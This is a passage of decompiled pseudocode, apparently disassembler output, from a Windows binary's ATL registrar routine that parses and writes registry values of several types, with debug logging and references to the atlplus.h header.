								__ecx = _a8;
								 *_a8 =  *_a8 + 4;
								__eax = _a8;
								 *_a8 =  *_a8 + 4;
								__ecx =  &_v96;
								__edx =  &_v84;
								__eax =  &_v72;
								__ecx = _a8;
								__edx =  *_a8;
								__eax =  *( *_a8);
								__ecx = _v28;
								__eax = E00D3A0F0(__ecx,  *( *_a8),  &_v72,  &_v84,  &_v96);
								goto L204;
							}
							__edx = _a12;
							__eax = _v84;
							__ecx =  &_v44;
							__edx = _a4;
							__ecx = _v28;
							_v56 = E00D38580(__ebx, _v28, __edi, __esi, __eflags, _a4,  &_v44, _v84, _a12);
							__eflags = _v56;
							if(_v56 >= 0) {
								goto L8;
							} else {
								__eax = _v56;
								_v2708 = _v56;
								_v8 = 0;
								__ecx =  &_v124;
								__eax = E00D3F220( &_v124);
								_v8 = 0xffffffff;
								__ecx =  &_v44;
								E00D34220(__ecx, __eflags) = _v2708;
								goto L206;
							}
						case 2:
							__eflags = _a24;
							if(__eflags == 0) {
								goto L12;
							}
							__ecx = _a12;
							__edx = _v84;
							__eax = _a4;
							__ecx = _v28;
							_v56 = E00D383D0(__ebx, _v28, __edi, __esi, __eflags, _a4, _v84, _a12);
							__eflags = _v56;
							if(_v56 >= 0) {
								goto L12;
							}
							__ecx = _v56;
							_v2712 = _v56;
							_v8 = 0;
							__ecx =  &_v124;
							__eax = E00D3F220( &_v124);
							_v8 = 0xffffffff;
							__ecx =  &_v44;
							E00D34220(__ecx, __eflags) = _v2712;
							goto L206;
						case 3:
							L12:
							__eflags = _a24;
							if(__eflags != 0) {
								__eax = _a12;
								__ecx = _v84;
								__edx =  &_v44;
								__eax = _a4;
								__ecx = _v28;
								_v56 = E00D38580(__ebx, _v28, __edi, __esi, __eflags, _a4,  &_v44, _v84, _a12);
								__eflags = _v56;
								if(_v56 >= 0) {
									L26:
									__edx = _a8;
									 *_a8 =  *_a8 + 4;
									__ecx = _a8;
									 *_a8 =  *_a8 + 4;
									__edx =  &_v96;
									__eax =  &_v84;
									__ecx =  &_v72;
									__edx = _a8;
									__eax =  *_a8;
									__ecx =  *( *_a8);
									__ecx = _v28;
									__eax = E00D3A0F0(__ecx,  *( *_a8),  &_v72,  &_v84,  &_v96);
									goto L204;
								}
								__ecx = _v56;
								_v2724 = _v56;
								_v8 = 0;
								__ecx =  &_v124;
								__eax = E00D3F220( &_v124);
								_v8 = 0xffffffff;
								__ecx =  &_v44;
								E00D34220(__ecx, __eflags) = _v2724;
								goto L206;
							}
							_v136 = 0;
							__ecx =  &_v156;
							__eax = E00D3E200( &_v156);
							__edx =  &_v136;
							__eax =  &_v156;
							__ecx = _v84;
							__edx = _a12;
							__ecx = _v28;
							_v56 = E00D38100(__ebx, __ecx, _a12, __edi, __esi, _a12, _v84,  &_v156,  &_v136);
							__eflags = _v56;
							if(__eflags >= 0) {
								_v52 = 2;
								__eflags = _a4;
								if(_a4 != 0) {
									__eflags = _v136;
									if(_v136 == 0) {
										__edx = _v156;
										_v2824 = _v156;
									} else {
										__ecx = _v136;
										_v2824 = _v136;
									}
									__eax = _v2824;
									__ecx = _a4;
									__ecx =  &_v44;
									_v52 = E00D345F0(__ecx, __esi, _a4, _v2824, 0x2001f);
								}
								__eflags = _v52;
								if(__eflags == 0) {
									L23:
									__eax = _a8;
									__ecx =  *_a8;
									__edx =  *( *_a8);
									_v64 =  *( *_a8);
									__ecx =  &_v156;
									__eax = E00D41F30( &_v156, __eflags);
									goto L26;
								} else {
									__eflags = _v52 - 2;
									if(__eflags == 0) {
										goto L23;
									}
									__edx = _v52;
									_v2720 = E00D32E00(__ecx, __eflags, _v52);
									__ecx =  &_v156;
									__eax = E00D41F30( &_v156, __eflags);
									_v8 = 0;
									__ecx =  &_v124;
									__eax = E00D3F220( &_v124);
									_v8 = 0xffffffff;
									__ecx =  &_v44;
									E00D34220(__ecx, __eflags) = _v2720;
									goto L206;
								}
							}
							__eax = _v56;
							_v2716 = _v56;
							__ecx =  &_v156;
							__eax = E00D41F30( &_v156, __eflags);
							_v8 = 0;
							__ecx =  &_v124;
							__eax = E00D3F220( &_v124);
							_v8 = 0xffffffff;
							__ecx =  &_v44;
							E00D34220(__ecx, __eflags) = _v2716;
							goto L206;
						case 4:
							__edx = 0;
							__eflags = 0;
							if(0 == 0) {
								__eax = L00D84930(0, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlplus.h", 0x211, 0, "%ls", 0xde40dc);
								__eflags = __eax - 1;
								if(__eax == 1) {
									asm("int3");
								}
							}
							goto L204;
						case 5:
							__ecx = _a8;
							 *_a8 =  *_a8 + 4;
							__eax = _a8;
							 *_a8 =  *_a8 + 4;
							__ecx = _a24;
							__edx = _a20;
							__eax = _a16;
							__ecx = _a12;
							__edx = _a8;
							__eax = _v44;
							__ecx = _v28;
							_v56 = E00D386D0(__ebx, _v28, __edi, __esi, _v44, _a8, _a12, _a16, _a20, _a24);
							__eflags = _v56;
							if(_v56 >= 0) {
								__edx =  &_v96;
								__eax =  &_v84;
								__ecx =  &_v72;
								__edx = _a8;
								__eax =  *_a8;
								__ecx =  *( *_a8);
								__ecx = _v28;
								__eax = E00D3A0F0(__ecx,  *( *_a8),  &_v72,  &_v84,  &_v96);
								__eflags = _a24;
								if(_a24 != 0) {
									L39:
									goto L204;
								}
								__edx = _v57 & 0x000000ff;
								__eflags = _v57 & 0x000000ff;
								if((_v57 & 0x000000ff) != 0) {
									_v57 = 0;
									goto L39;
								}
								__eax =  &_v192;
								__ecx =  &_v180;
								__edx =  &_v168;
								__eax = _v64;
								__ecx = _v28;
								__eax = E00D3A0F0(_v28, _v64,  &_v168,  &_v180,  &_v192);
								__ecx = _a12;
								__edx = _v180;
								__eax = _a4;
								__ecx = _v28;
								_v56 = E00D383D0(__ebx, __ecx, __edi, __esi, __eflags, _a4, _v180, _a12);
								__eflags = _v56;
								if(_v56 >= 0) {
									goto L39;
								}
								__ecx = _v56;
								_v2732 = _v56;
								_v8 = 0;
								__ecx =  &_v124;
								__eax = E00D3F220( &_v124);
								_v8 = 0xffffffff;
								__ecx =  &_v44;
								E00D34220(__ecx, __eflags) = _v2732;
								goto L206;
							}
							__ecx = _v56;
							_v2728 = _v56;
							_v8 = 0;
							__ecx =  &_v124;
							__eax = E00D3F220( &_v124);
							_v8 = 0xffffffff;
							__ecx =  &_v44;
							E00D34220(__ecx, __eflags) = _v2728;
							goto L206;
						case 6:
							__edx = 0;
							__eflags = 0;
							if(0 == 0) {
								__eax = L00D84930(0, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlplus.h", 0x228, 0, 0xde40e0, 0xde40dc);
								__eflags = __eax - 1;
								if(__eax == 1) {
									asm("int3");
								}
							}
							_v2736 = 0x80004005;
							_v8 = 0;
							__ecx =  &_v124;
							__eax = E00D3F220( &_v124);
							_v8 = 0xffffffff;
							__ecx =  &_v44;
							E00D34220(__ecx, __eflags) = _v2736;
							goto L206;
						case 7:
							_v84 = _v84 | 0x80000000;
							_v200 = _v84 | 0x80000000;
							__edx = _a8;
							 *_a8 =  *_a8 + 4;
							__ecx = _a8;
							 *_a8 =  *_a8 + 4;
							__edx = _a24;
							__eax = _a20;
							__ecx = _a16;
							__edx = _a12;
							__eax = _a8;
							__ecx = _v200;
							__ecx = _v28;
							_v2740 = E00D386D0(__ebx, _v28, __edi, __esi, _v200, _a8, _a12, _a16, _a20, _a24);
							_v8 = 0;
							__ecx =  &_v124;
							__eax = E00D3F220( &_v124);
							_v8 = 0xffffffff;
							__ecx =  &_v44;
							E00D34220(__ecx, __eflags) = _v2740;
							goto L206;
						case 8:
							__eflags = _a24;
							if(_a24 == 0) {
								L77:
								__edx = _a8;
								 *_a8 =  *_a8 + 4;
								__ecx = _a8;
								 *_a8 =  *_a8 + 4;
								__edx =  &_v96;
								__eax =  &_v84;
								__ecx =  &_v72;
								__edx = _a8;
								__eax =  *_a8;
								__ecx =  *( *_a8);
								__ecx = _v28;
								__eax = E00D3A0F0(__ecx,  *( *_a8),  &_v72,  &_v84,  &_v96);
								goto L204;
							}
							_v201 = 0;
							__eflags = _v44;
							if(_v44 == 0) {
								__edx = _a4;
								_v44 = _a4;
								_v201 = 1;
							}
							__ecx =  &_v220;
							__eax = E00D3E200( &_v220);
							_v8 = 2;
							__ecx =  &_v240;
							__eax = E00D3E200( &_v240);
							_v8 = 3;
							_v252 = 0;
							_v264 = 0;
							__eax =  &_v252;
							__ecx =  &_v220;
							__edx = _v96;
							__eax = _a12;
							__ecx = _v28;
							_v56 = E00D38100(__ebx, _v28, _v96, __edi, __esi, _a12, _v96,  &_v220,  &_v252);
							__eflags = _v56;
							if(_v56 >= 0) {
								__eflags = _v84;
								if(_v84 != 0) {
									__ecx =  &_v264;
									__edx =  &_v240;
									__eax = _v84;
									__ecx = _a12;
									__ecx = _v28;
									_v56 = E00D38100(__ebx, _v28,  &_v240, __edi, __esi, _a12, _v84,  &_v240,  &_v264);
								}
							}
							__ecx =  &_v284;
							__eax = E00D341C0( &_v284, 0);
							_v8 = 4;
							__eflags = _v84;
							if(_v84 != 0) {
								__eax = _a4;
								_v284 = _a4;
							} else {
								__edx = _v44;
								_v284 = _v44;
							}
							__eflags = _v252;
							if(_v252 == 0) {
								__edx = _v220;
								_v2828 = _v220;
							} else {
								__ecx = _v252;
								_v2828 = _v252;
							}
							__eflags = _v84;
							if(_v84 == 0) {
								_v2836 = 0;
							} else {
								__eflags = _v264;
								if(_v264 == 0) {
									__ecx = _v240;
									_v2832 = _v240;
								} else {
									__eax = _v264;
									_v2832 = _v264;
								}
								__edx = _v2832;
								_v2836 = _v2832;
							}
							__eax = _v2828;
							__ecx = _v2836;
							__ecx =  &_v284;
							_v52 = E00D34840(__ecx, __esi, _v2836, _v2828, 1);
							_v284 = 0;
							__eflags = _v52;
							if(__eflags == 0) {
								__eax = _v201 & 0x000000ff;
								__eflags = _v201 & 0x000000ff;
								if((_v201 & 0x000000ff) != 0) {
									_v44 = 0;
								}
								__eflags = _v84;
								if(_v84 == 0) {
									_v2844 = "default";
								} else {
									__eflags = _v264;
									if(_v264 == 0) {
										__edx = _v240;
										_v2840 = _v240;
									} else {
										__ecx = _v264;
										_v2840 = _v264;
									}
									__eax = _v2840;
									_v2844 = _v2840;
								}
								__eflags = _v252;
								if(__eflags == 0) {
									__edx = _v220;
									_v2848 = _v220;
								} else {
									__ecx = _v252;
									_v2848 = _v252;
								}
								__eax = _v2844;
								_push(_v2844);
								__ecx = _v2848;
								__ecx = 0xf237ac;
								__eax = E00D3F1F0(0xf237ac);
								__ecx =  &_v2752;
								E00D323B0( &_v2752, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlplus.h", 0x24e) = E00D323E0(__ebx, __edi, __esi, __eflags, __eax, __eax, 2, "Setting Value %Ts at %Ts\n", _v2848);
								_v8 = 3;
								__ecx =  &_v284;
								__eax = E00D34220( &_v284, __eflags);
								_v8 = 2;
								__ecx =  &_v240;
								__eax = E00D41F30( &_v240, __eflags);
								_v8 = 1;
								__ecx =  &_v220;
								__eax = E00D41F30( &_v220, __eflags);
								goto L77;
							} else {
								__edx = _v52;
								_v2744 = E00D32E00(__ecx, __eflags, _v52);
								_v8 = 3;
								__ecx =  &_v284;
								__eax = E00D34220( &_v284, __eflags);
								_v8 = 2;
								__ecx =  &_v240;
								__eax = E00D41F30( &_v240, __eflags);
								_v8 = 1;
								__ecx =  &_v220;
								__eax = E00D41F30( &_v220, __eflags);
								_v8 = 0;
								__ecx =  &_v124;
								__eax = E00D3F220( &_v124);
								_v8 = 0xffffffff;
								__ecx =  &_v44;
								E00D34220(__ecx, __eflags) = _v2744;
								goto L206;
							}
						case 9:
							__eflags = _a24;
							if(_a24 == 0) {
								L126:
								__eax = _a8;
								 *_a8 =  *_a8 + 4;
								__edx = _a8;
								 *_a8 =  *_a8 + 4;
								__eax =  &_v96;
								__ecx =  &_v84;
								__edx =  &_v72;
								__eax = _a8;
								__ecx =  *_a8;
								__edx =  *( *_a8);
								__ecx = _v28;
								__eax = E00D3A0F0(__ecx,  *( *_a8),  &_v72,  &_v84,  &_v96);
								goto L204;
							}
							_v289 = 0;
							__eflags = _v44;
							if(_v44 == 0) {
								__edx = _a4;
								_v44 = _a4;
								_v289 = 1;
							}
							__ecx =  &_v308;
							__eax = E00D3E200( &_v308);
							_v8 = 5;
							__ecx =  &_v328;
							__eax = E00D3E200( &_v328);
							_v8 = 6;
							_v340 = 0;
							_v352 = 0;
							__eax =  &_v340;
							__ecx =  &_v308;
							__edx = _v96;
							__eax = _a12;
							__ecx = _v28;
							_v56 = E00D38100(__ebx, _v28, _v96, __edi, __esi, _a12, _v96,  &_v308,  &_v340);
							__eflags = _v56;
							if(_v56 >= 0) {
								__eflags = _v84;
								if(_v84 != 0) {
									__ecx =  &_v352;
									__edx =  &_v328;
									__eax = _v84;
									__ecx = _a12;
									__ecx = _v28;
									_v56 = E00D38100(__ebx, _v28,  &_v328, __edi, __esi, _a12, _v84,  &_v328,  &_v352);
								}
							}
							__eflags = _v84;
							if(_v84 == 0) {
								_v2856 = "default";
							} else {
								__eflags = _v352;
								if(_v352 == 0) {
									__eax = _v328;
									_v2852 = _v328;
								} else {
									__edx = _v352;
									_v2852 = _v352;
								}
								__ecx = _v2852;
								_v2856 = _v2852;
							}
							__eflags = _v340;
							if(__eflags == 0) {
								__eax = _v308;
								_v2860 = _v308;
							} else {
								__edx = _v340;
								_v2860 = _v340;
							}
							__ecx = _v2856;
							_push(_v2856);
							__edx = _v2860;
							__ecx = 0xf237ac;
							__eax = E00D3F1F0(0xf237ac);
							__ecx =  &_v2760;
							E00D323B0( &_v2760, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlplus.h", 0x265) = E00D323E0(__ebx, __edi, __esi, __eflags, __eax, __eax, 2, "Setting Value %Ts at %Ts\n", _v2860);
							__eflags = _v340;
							if(_v340 == 0) {
								__ecx = _v308;
								_v2864 = _v308;
							} else {
								__eax = _v340;
								_v2864 = _v340;
							}
							__edx = _v2864;
							_v360 = _v2864;
							__eax = _v360;
							__eax = E00D82E00(_v360);
							_v364 = __eax;
							__ecx =  &_v1396;
							__eax = E00D3EAC0( &_v1396);
							_v8 = 7;
							_v8 = 8;
							__ecx = _v364;
							__ecx =  &_v1396;
							__eax = E00D3EA30(__ebx,  &_v1396, __eflags, _v364);
							_v8 = 7;
							__ecx =  &_v1396;
							__eax = E00D3EA70( &_v1396);
							__eflags = __eax;
							if(__eax == 0) {
								_v2768 = 0x8007000e;
								_v8 = 6;
								__ecx =  &_v1396;
								__eax = E00D3EA80( &_v1396);
								_v8 = 5;
								__ecx =  &_v328;
								__eax = E00D41F30( &_v328, __eflags);
								_v8 = 1;
								__ecx =  &_v308;
								__eax = E00D41F30( &_v308, __eflags);
								_v8 = 0;
								__ecx =  &_v124;
								__eax = E00D3F220( &_v124);
								_v8 = 0xffffffff;
								__ecx =  &_v44;
								E00D34220(__ecx, __eflags) = _v2768;
								goto L206;
							} else {
								__ecx =  &_v1396;
								_v1404 = E00D3EA70( &_v1396);
								__edx = _v360;
								_v1408 = _v360;
								_v364 = 0;
								while(1) {
									__eax = _v1408;
									__ecx =  *_v1408;
									__eflags =  *_v1408;
									if( *_v1408 == 0) {
										break;
									}
									__esi = __esp;
									__edx = _v1408;
									__eax = CharNextA(_v1408);
									__eflags = __esp - __esp;
									_v1412 = __eax;
									__eax = _v1408;
									__ecx =  *_v1408;
									__eflags =  *_v1408 - 0x5c;
									if( *_v1408 != 0x5c) {
										L104:
										__ecx = _v1404;
										__edx = _v1408;
										__al =  *_v1408;
										 *_v1404 = __al;
										__esi = __esp;
										__ecx = _v1408;
										__edx =  *_v1408 & 0x000000ff;
										__eax = IsDBCSLeadByte( *_v1408 & 0x000000ff);
										__eflags = __esi - __esp;
										__eax = E00DC1520(__eax, __esi - __esp);
										__eflags = __eax;
										if(__eax == 0) {
											L108:
											_v1404 = _v1404 + 1;
											_v1404 = _v1404 + 1;
											__edx = _v1408;
											__edx =  &(_v1408[1]);
											__eflags = __edx;
											_v1408 = __edx;
											L109:
											_v364 = _v364 + 1;
											_v364 = _v364 + 1;
											continue;
										}
										_v1404 = _v1404 + 1;
										_v1404 = _v1404 + 1;
										_v1408 =  &(_v1408[1]);
										_v1408 =  &(_v1408[1]);
										__edx = _v1408;
										__eax =  *_v1408;
										__eflags =  *_v1408;
										if( *_v1408 != 0) {
											__ecx = _v1404;
											__edx = _v1408;
											__al =  *_v1408;
											 *_v1404 = __al;
											goto L108;
										}
										break;
									}
									__edx = _v1412;
									__eax =  *_v1412;
									__eflags =  *_v1412 - 0x30;
									if( *_v1412 != 0x30) {
										goto L104;
									}
									__ecx = _v1404;
									 *_v1404 = 0;
									_v1404 = _v1404 + 1;
									_v1404 = _v1404 + 1;
									__esi = __esp;
									__eax = _v1412;
									__eax = CharNextA(_v1412);
									__eflags = __esi - __esp;
									_v1408 = __eax;
									goto L109;
								}
								__ecx = _v1404;
								 *_v1404 = 0;
								_v1404 = _v1404 + 1;
								_v1404 = _v1404 + 1;
								__eax = _v1404;
								 *_v1404 = 0;
								__ecx =  &_v1428;
								__eax = E00D341C0( &_v1428, 0);
								__eflags = _v84;
								if(_v84 != 0) {
									__edx = _a4;
									_v1428 = _a4;
								} else {
									__ecx = _v44;
									_v1428 = _v44;
								}
								__eflags = _v84;
								if(_v84 == 0) {
									_v2872 = 0;
								} else {
									__eflags = _v352;
									if(_v352 == 0) {
										__ecx = _v328;
										_v2868 = _v328;
									} else {
										__eax = _v352;
										_v2868 = _v352;
									}
									__edx = _v2868;
									_v2872 = _v2868;
								}
								__ecx =  &_v1396;
								E00D3EA70( &_v1396) = _v2872;
								__ecx =  &_v1428;
								_v52 = E00D34960( &_v1428, __esi, _v2872, _v2872);
								_v1428 = 0;
								__eflags = _v52;
								if(__eflags == 0) {
									__edx = _v289 & 0x000000ff;
									__eflags = _v289 & 0x000000ff;
									if(__eflags != 0) {
										_v44 = 0;
									}
									__ecx =  &_v1428;
									__eax = E00D34220( &_v1428, __eflags);
									_v8 = 6;
									__ecx =  &_v1396;
									__eax = E00D3EA80( &_v1396);
									_v8 = 5;
									__ecx =  &_v328;
									__eax = E00D41F30( &_v328, __eflags);
									_v8 = 1;
									__ecx =  &_v308;
									__eax = E00D41F30( &_v308, __eflags);
									goto L126;
								} else {
									__ecx = _v52;
									_v2764 = E00D32E00(_v52, __eflags, _v52);
									__ecx =  &_v1428;
									__eax = E00D34220( &_v1428, __eflags);
									_v8 = 6;
									__ecx =  &_v1396;
									__eax = E00D3EA80( &_v1396);
									_v8 = 5;
									__ecx =  &_v328;
									__eax = E00D41F30( &_v328, __eflags);
									_v8 = 1;
									__ecx =  &_v308;
									__eax = E00D41F30( &_v308, __eflags);
									_v8 = 0;
									__ecx =  &_v124;
									__eax = E00D3F220( &_v124);
									_v8 = 0xffffffff;
									__ecx =  &_v44;
									E00D34220(__ecx, __eflags) = _v2764;
									goto L206;
								}
							}
						case 0xa:
							__eflags = _a24;
							if(_a24 == 0) {
								L160:
								__ecx = _a8;
								 *_a8 =  *_a8 + 4;
								__eax = _a8;
								 *_a8 =  *_a8 + 4;
								__ecx =  &_v96;
								__edx =  &_v84;
								__eax =  &_v72;
								__ecx = _a8;
								__edx =  *_a8;
								__eax =  *( *_a8);
								__ecx = _v28;
								__eax = E00D3A0F0(__ecx,  *( *_a8),  &_v72,  &_v84,  &_v96);
								goto L204;
							}
							_v1433 = 0;
							__eflags = _v44;
							if(_v44 == 0) {
								__eax = _a4;
								_v44 = _a4;
								_v1433 = 1;
							}
							__ecx =  &_v1452;
							__eax = E00D3E200( &_v1452);
							_v8 = 0xa;
							__ecx =  &_v1472;
							__eax = E00D3E200( &_v1472);
							_v8 = 0xb;
							_v1484 = 0;
							_v1496 = 0;
							__ecx =  &_v1508;
							__edx = _v96;
							__eax = _a16;
							__ecx = _v28;
							_v56 = E00D38330(_v28, _a16, _v96,  &_v1508);
							__eflags = _v56 - 1;
							if(_v56 != 1) {
								L137:
								__eflags = _v56;
								if(_v56 >= 0) {
									__eflags = _v84;
									if(_v84 != 0) {
										__eax =  &_v1496;
										__ecx =  &_v1472;
										__edx = _v84;
										__eax = _a12;
										__ecx = _v28;
										_v56 = E00D38100(__ebx, _v28, _v84, __edi, __esi, _a12, _v84,  &_v1472,  &_v1496);
									}
								}
								__ecx =  &_v1540;
								__eax = E00D341C0( &_v1540, 0);
								_v8 = 0xc;
								__eflags = _v84;
								if(_v84 != 0) {
									__edx = _a4;
									_v1540 = _a4;
								} else {
									__ecx = _v44;
									_v1540 = _v44;
								}
								__eflags = _v1496;
								if(_v1496 == 0) {
									__ecx = _v1472;
									_v2880 = _v1472;
								} else {
									__eax = _v1496;
									_v2880 = _v1496;
								}
								__edx = _v1508;
								__eax = _v2880;
								__ecx =  &_v1540;
								_v52 = E00D347C0( &_v1540, __esi, _v2880, _v1508);
								_v1540 = 0;
								__eflags = _v52;
								if(__eflags == 0) {
									__edx = _v1433 & 0x000000ff;
									__eflags = _v1433 & 0x000000ff;
									if((_v1433 & 0x000000ff) != 0) {
										_v44 = 0;
									}
									__eflags = _v84;
									if(_v84 == 0) {
										_v2888 = "default";
									} else {
										__eflags = _v1496;
										if(_v1496 == 0) {
											__ecx = _v1472;
											_v2884 = _v1472;
										} else {
											__eax = _v1496;
											_v2884 = _v1496;
										}
										__edx = _v2884;
										_v2888 = _v2884;
									}
									__eflags = _v1484;
									if(__eflags == 0) {
										__ecx = _v1452;
										_v2892 = _v1452;
									} else {
										__eax = _v1484;
										_v2892 = _v1484;
									}
									__edx = _v2888;
									_push(_v2888);
									__eax = _v2892;
									__ecx = 0xf237ac;
									__eax = E00D3F1F0(0xf237ac);
									__ecx =  &_v2784;
									E00D323B0( &_v2784, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlplus.h", 0x2d2) = E00D323E0(__ebx, __edi, __esi, __eflags, __eax, __eax, 2, "Setting Value %Ts at %Ts\n", _v2892);
									_v8 = 0xb;
									__ecx =  &_v1540;
									__eax = E00D34220( &_v1540, __eflags);
									_v8 = 0xa;
									__ecx =  &_v1472;
									__eax = E00D41F30( &_v1472, __eflags);
									_v8 = 1;
									__ecx =  &_v1452;
									__eax = E00D41F30( &_v1452, __eflags);
									goto L160;
								} else {
									__ecx = _v52;
									_v2776 = E00D32E00(_v52, __eflags, _v52);
									_v8 = 0xb;
									__ecx =  &_v1540;
									__eax = E00D34220( &_v1540, __eflags);
									_v8 = 0xa;
									__ecx =  &_v1472;
									__eax = E00D41F30( &_v1472, __eflags);
									_v8 = 1;
									__ecx =  &_v1452;
									__eax = E00D41F30( &_v1452, __eflags);
									_v8 = 0;
									__ecx =  &_v124;
									__eax = E00D3F220( &_v124);
									_v8 = 0xffffffff;
									__ecx =  &_v44;
									E00D34220(__ecx, __eflags) = _v2776;
									goto L206;
								}
							} else {
								__ecx =  &_v1484;
								__edx =  &_v1452;
								__eax = _v1508;
								__ecx = _a12;
								__ecx = _v28;
								__eax = E00D38100(__ebx, _v28,  &_v1452, __edi, __esi, _a12, _v1508,  &_v1452,  &_v1484);
								__eflags = _v1484;
								if(__eflags == 0) {
									__eax = _v1452;
									_v2876 = _v1452;
								} else {
									__edx = _v1484;
									_v2876 = _v1484;
								}
								__ecx = _v2876;
								__ecx =  &_v1520;
								__eax = E00D3E4E0(__ebx,  &_v1520, __eflags, _v2876);
								__esi = __esp;
								__edx =  &_v1508;
								_push( &_v1508);
								_push(0);
								_push(0);
								__ecx =  &_v1520;
								__eax = E00D3E570( &_v1520);
								_push(__eax);
								__imp__#277();
								__eflags = __esi - __esp;
								_v56 = __eax;
								__eflags = _v56;
								if(__eflags >= 0) {
									__ecx =  &_v1520;
									__eax = E00D3E4B0( &_v1520, __eflags);
									goto L137;
								} else {
									_v2772 = 0x80004005;
									__ecx =  &_v1520;
									__eax = E00D3E4B0( &_v1520, __eflags);
									_v8 = 0xa;
									__ecx =  &_v1472;
									__eax = E00D41F30( &_v1472, __eflags);
									_v8 = 1;
									__ecx =  &_v1452;
									__eax = E00D41F30( &_v1452, __eflags);
									_v8 = 0;
									__ecx =  &_v124;
									__eax = E00D3F220( &_v124);
									_v8 = 0xffffffff;
									__ecx =  &_v44;
									E00D34220(__ecx, __eflags) = _v2772;
									goto L206;
								}
							}
						case 0xb:
							__eflags = _a24;
							if(_a24 == 0) {
								L200:
								__edx = _a8;
								 *_a8 =  *_a8 + 4;
								__ecx = _a8;
								 *_a8 =  *_a8 + 4;
								__edx =  &_v96;
								__eax =  &_v84;
								__ecx =  &_v72;
								__edx = _a8;
								__eax =  *_a8;
								__ecx =  *( *_a8);
								__ecx = _v28;
								__eax = E00D3A0F0(__ecx,  *( *_a8),  &_v72,  &_v84,  &_v96);
								goto L204;
							}
							_v1545 = 0;
							__eflags = _v44;
							if(_v44 == 0) {
								__ecx = _a4;
								_v44 = _a4;
								_v1545 = 1;
							}
							__ecx =  &_v1564;
							__eax = E00D3E200( &_v1564);
							_v8 = 0xd;
							__ecx =  &_v1584;
							__eax = E00D3E200( &_v1584);
							_v8 = 0xe;
							_v1596 = 0;
							_v1608 = 0;
							__ecx =  &_v2656;
							__eax = E00D3E010( &_v2656);
							_v8 = 0xf;
							__edx =  &_v2668;
							__eax =  &_v1620;
							__ecx = _v96;
							__edx = _a20;
							__ecx = _v28;
							_v56 = E00D38370(_v28, _a20, _v96,  &_v1620,  &_v2668);
							__eflags = _v56 - 1;
							if(_v56 != 1) {
								L177:
								__eflags = _v56;
								if(_v56 >= 0) {
									__eflags = _v84;
									if(_v84 != 0) {
										__eax =  &_v1608;
										__ecx =  &_v1584;
										__edx = _v84;
										__eax = _a12;
										__ecx = _v28;
										_v56 = E00D38100(__ebx, _v28, _v84, __edi, __esi, _a12, _v84,  &_v1584,  &_v1608);
									}
								}
								__ecx =  &_v2696;
								__eax = E00D341C0( &_v2696, 0);
								_v8 = 0x12;
								__eflags = _v84;
								if(_v84 != 0) {
									__edx = _a4;
									_v2696 = _a4;
								} else {
									__ecx = _v44;
									_v2696 = _v44;
								}
								__eflags = _v1608;
								if(_v1608 == 0) {
									__ecx = _v1584;
									_v2896 = _v1584;
								} else {
									__eax = _v1608;
									_v2896 = _v1608;
								}
								__edx = _v2668;
								__eax = _v1620;
								__ecx = _v2896;
								__ecx =  &_v2696;
								_v52 = E00D34740(__ecx, __esi, _v2896, _v1620, _v2668);
								_v2696 = 0;
								__eflags = _v52;
								if(__eflags == 0) {
									__eax = _v1545 & 0x000000ff;
									__eflags = _v1545 & 0x000000ff;
									if((_v1545 & 0x000000ff) != 0) {
										_v44 = 0;
									}
									__eflags = _v84;
									if(_v84 == 0) {
										_v2904 = "default";
									} else {
										__eflags = _v1608;
										if(_v1608 == 0) {
											__edx = _v1584;
											_v2900 = _v1584;
										} else {
											__ecx = _v1608;
											_v2900 = _v1608;
										}
										__eax = _v2900;
										_v2904 = _v2900;
									}
									__eflags = _v1596;
									if(__eflags == 0) {
										__edx = _v1564;
										_v2908 = _v1564;
									} else {
										__ecx = _v1596;
										_v2908 = _v1596;
									}
									__eax = _v2904;
									_push(_v2904);
									__ecx = _v2908;
									__ecx = 0xf237ac;
									__eax = E00D3F1F0(0xf237ac);
									__ecx =  &_v2812;
									E00D323B0( &_v2812, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlplus.h", 0x311) = E00D323E0(__ebx, __edi, __esi, __eflags, __eax, __eax, 2, "Setting Value %Ts at %Ts\n", _v2908);
									_v8 = 0xf;
									__ecx =  &_v2696;
									__eax = E00D34220( &_v2696, __eflags);
									_v8 = 0xe;
									__ecx =  &_v2656;
									__eax = E00D3DFD0( &_v2656);
									_v8 = 0xd;
									__ecx =  &_v1584;
									__eax = E00D41F30( &_v1584, __eflags);
									_v8 = 1;
									__ecx =  &_v1564;
									__eax = E00D41F30( &_v1564, __eflags);
									goto L200;
								} else {
									__edx = _v52;
									_v2804 = E00D32E00(__ecx, __eflags, _v52);
									_v8 = 0xf;
									__ecx =  &_v2696;
									__eax = E00D34220( &_v2696, __eflags);
									_v8 = 0xe;
									__ecx =  &_v2656;
									__eax = E00D3DFD0( &_v2656);
									_v8 = 0xd;
									__ecx =  &_v1584;
									__eax = E00D41F30( &_v1584, __eflags);
									_v8 = 1;
									__ecx =  &_v1564;
									__eax = E00D41F30( &_v1564, __eflags);
									_v8 = 0;
									__ecx =  &_v124;
									__eax = E00D3F220( &_v124);
									_v8 = 0xffffffff;
									__ecx =  &_v44;
									E00D34220(__ecx, __eflags) = _v2804;
									goto L206;
								}
							} else {
								__eax =  &_v1596;
								__ecx =  &_v1564;
								__edx = _v2668;
								__eax = _a12;
								__ecx = _v28;
								__eax = E00D38100(__ebx, _v28, _v2668, __edi, __esi, _a12, _v2668,  &_v1564,  &_v1596);
								__eflags = _v1596;
								if(_v1596 == 0) {
									__ecx = _v1564;
									_v1596 = _v1564;
								}
								__edx = _v1596;
								_v2676 = E00D82E00(_v1596);
								_v2676 = _v2676 & 0x00000001;
								__eflags = _v2676 & 0x00000001;
								if(__eflags == 0) {
									__eax = _v2676;
									asm("cdq");
									_v2676 - __edx = _v2676 - __edx >> 1;
									_v2668 = _v2676 - __edx >> 1;
									_v8 = 0x10;
									__ecx = _v2668;
									__ecx =  &_v2656;
